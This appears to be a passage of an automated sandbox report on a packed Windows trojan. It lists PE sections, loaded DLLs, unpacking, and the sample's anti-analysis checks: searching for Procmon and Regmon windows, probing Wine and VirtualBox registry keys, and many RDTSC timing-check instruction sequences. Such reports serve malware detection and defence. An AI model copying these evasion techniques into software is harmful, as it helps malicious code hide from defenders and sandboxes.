              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADCDF0_2_008ADCDF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8C6A0_2_008B8C6A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B05A80_2_008B05A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DA5460_2_007DA546
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A56740_2_008A5674
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 004F4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: kuxshahz ZLIB complexity 0.9946806168421833
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00513A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00513A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0050CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\6OU64QPA.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1832448 > 1048576
              Source: file.exeStatic PE information: Raw size of kuxshahz is bigger than: 0x100000 < 0x1a5600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kuxshahz:EW;horlowmv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kuxshahz:EW;horlowmv:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00516390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cf0dc should be: 0x1c2d8e
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: kuxshahz
              Source: file.exeStatic PE information: section name: horlowmv
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098E09B push edi; mov dword ptr [esp], 52714DB1h0_2_0098E0C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CE87B push eax; mov dword ptr [esp], edx0_2_007CE8F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CE87B push ecx; mov dword ptr [esp], esi0_2_007CE914
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3897 push 6B23079Ah; mov dword ptr [esp], esi0_2_008D38DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC860 push eax; mov dword ptr [esp], edx0_2_007EC889
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC860 push edx; mov dword ptr [esp], ebx0_2_007EC934
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC860 push 22ABFD69h; mov dword ptr [esp], eax0_2_007EC9B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC860 push 2C0897D0h; mov dword ptr [esp], ecx0_2_007EC9E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC860 push eax; mov dword ptr [esp], edx0_2_007ECA9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009528B1 push 08E238A0h; mov dword ptr [esp], esi0_2_0095293F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BD8A4 push 1245C093h; mov dword ptr [esp], ebx0_2_008BD8D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F0A7 push ecx; mov dword ptr [esp], ebx0_2_0095F0CF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009268AB push 7AA5ECFFh; mov dword ptr [esp], esp0_2_009268EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB0CA push edi; mov dword ptr [esp], ecx0_2_008EB11E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB0CA push 67741141h; mov dword ptr [esp], esi0_2_008EB140
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB0CA push edx; mov dword ptr [esp], edi0_2_008EB15E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096F0F4 push 1C5FEE5Ah; mov dword ptr [esp], edi0_2_0096F15D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096F0F4 push 6E4ABB5Ah; mov dword ptr [esp], edx0_2_0096F28A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092900F push 26BB4F21h; mov dword ptr [esp], ebp0_2_00929077
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092900F push edi; mov dword ptr [esp], eax0_2_009290CB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972838 push 20E392EAh; mov dword ptr [esp], eax0_2_00972841
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00517895 push ecx; ret 0_2_005178A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976042 push esi; mov dword ptr [esp], eax0_2_00976065
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976042 push ebp; mov dword ptr [esp], 57DEBE71h0_2_0097607C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00976042 push ebp; mov dword ptr [esp], edi0_2_00976101
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push 772C03E0h; mov dword ptr [esp], ebp0_2_0085A881
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edi; mov dword ptr [esp], edx0_2_0085A88D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edx; mov dword ptr [esp], ebx0_2_0085A95B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edx; mov dword ptr [esp], ecx0_2_0085A99E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push 7A0DC21Dh; mov dword ptr [esp], eax0_2_0085A9C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4875 push eax; mov dword ptr [esp], ecx0_2_008B487A
              Source: file.exeStatic PE information: section name: kuxshahz entropy: 7.953437289749726

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00516390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25702
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740490 second address: 7404A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95244h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDBFE second address: 8BDC26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE52CBFFE22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A871A second address: 8A8720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCA72 second address: 8BCA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCA76 second address: 8BCAA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95243h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FE52CC95242h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCAA5 second address: 8BCADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE22h 0x00000007 jmp 00007FE52CBFFE1Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FE52CBFFE16h 0x00000018 jmp 00007FE52CBFFE1Fh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCADF second address: 8BCAE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCAE3 second address: 8BCAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCAE9 second address: 8BCB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FE52CC95236h 0x0000000d jmp 00007FE52CC9523Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCFC5 second address: 8BCFDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE52CBFFE21h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCFDD second address: 8BCFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCFE5 second address: 8BD00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE52CBFFE26h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD00A second address: 8BD018 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD170 second address: 8BD175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD175 second address: 8BD190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE52CC95245h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD190 second address: 8BD196 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2EA second address: 8BD2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2F0 second address: 8BD2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2F4 second address: 8BD309 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CC9523Dh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD309 second address: 8BD310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD310 second address: 8BD316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD492 second address: 8BD4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE29h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD4AF second address: 8BD4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFC6F second address: 8BFCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE52CBFFE20h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cld 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D3559h], ecx 0x00000017 call 00007FE52CBFFE19h 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007FE52CBFFE1Ch 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFD6A second address: 8BFD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFD6F second address: 8BFD83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FE52CBFFE20h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDDA second address: 8BFDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95240h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDEE second address: 8BFDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDF2 second address: 8BFE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2D76h], ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FE52CC95238h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov esi, dword ptr [ebp+122D398Eh] 0x00000033 call 00007FE52CC95239h 0x00000038 jmp 00007FE52CC9523Eh 0x0000003d push eax 0x0000003e jnp 00007FE52CC95240h 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 jmp 00007FE52CC9523Fh 0x0000004d mov eax, dword ptr [eax] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFE72 second address: 8BFE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFE78 second address: 8BFE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFE7D second address: 8BFE8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFE8E second address: 8BFE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFE92 second address: 8BFF20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE22h 0x0000000b popad 0x0000000c pop eax 0x0000000d movzx ecx, cx 0x00000010 push 00000003h 0x00000012 mov dword ptr [ebp+122D2D76h], edx 0x00000018 mov dword ptr [ebp+122D1832h], edx 0x0000001e push 00000000h 0x00000020 cld 0x00000021 push 00000003h 0x00000023 jp 00007FE52CBFFE1Ch 0x00000029 or dword ptr [ebp+122D181Fh], esi 0x0000002f mov ecx, dword ptr [ebp+122D38A2h] 0x00000035 push B0B6062Bh 0x0000003a jno 00007FE52CBFFE33h 0x00000040 xor dword ptr [esp], 70B6062Bh 0x00000047 mov dword ptr [ebp+122D3581h], esi 0x0000004d lea ebx, dword ptr [ebp+12453B54h] 0x00000053 mov dword ptr [ebp+122D2E32h], edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c je 00007FE52CBFFE18h 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFF87 second address: 8BFF8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFF8C second address: 8BFFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, 586E6961h 0x0000000f pushad 0x00000010 jmp 00007FE52CBFFE22h 0x00000015 mov eax, dword ptr [ebp+122D2E10h] 0x0000001b popad 0x0000001c push 00000000h 0x0000001e xor esi, dword ptr [ebp+122D3B4Ah] 0x00000024 push CDCBBBC0h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E11CB second address: 8E11CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E11CF second address: 8E11D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E11D3 second address: 8E11DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF2FB second address: 8DF332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE52CBFFE22h 0x00000012 jmp 00007FE52CBFFE1Fh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF332 second address: 8DF338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF338 second address: 8DF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF489 second address: 8DF497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF497 second address: 8DF4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF4A3 second address: 8DF4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF4A7 second address: 8DF4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF4AB second address: 8DF4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FE52CC95247h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF4CC second address: 8DF4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF4D2 second address: 8DF4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF72A second address: 8DF730 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF730 second address: 8DF73A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE52CC9523Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DFB66 second address: 8DFB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007FE52CBFFE1Dh 0x0000000d jmp 00007FE52CBFFE1Bh 0x00000012 popad 0x00000013 jc 00007FE52CBFFE26h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0D24 second address: 8B0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95249h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0D41 second address: 8B0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0D4D second address: 8B0D53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E09A3 second address: 8E09AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CBFFE22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E09AD second address: 8E09B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0ACC second address: 8E0AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
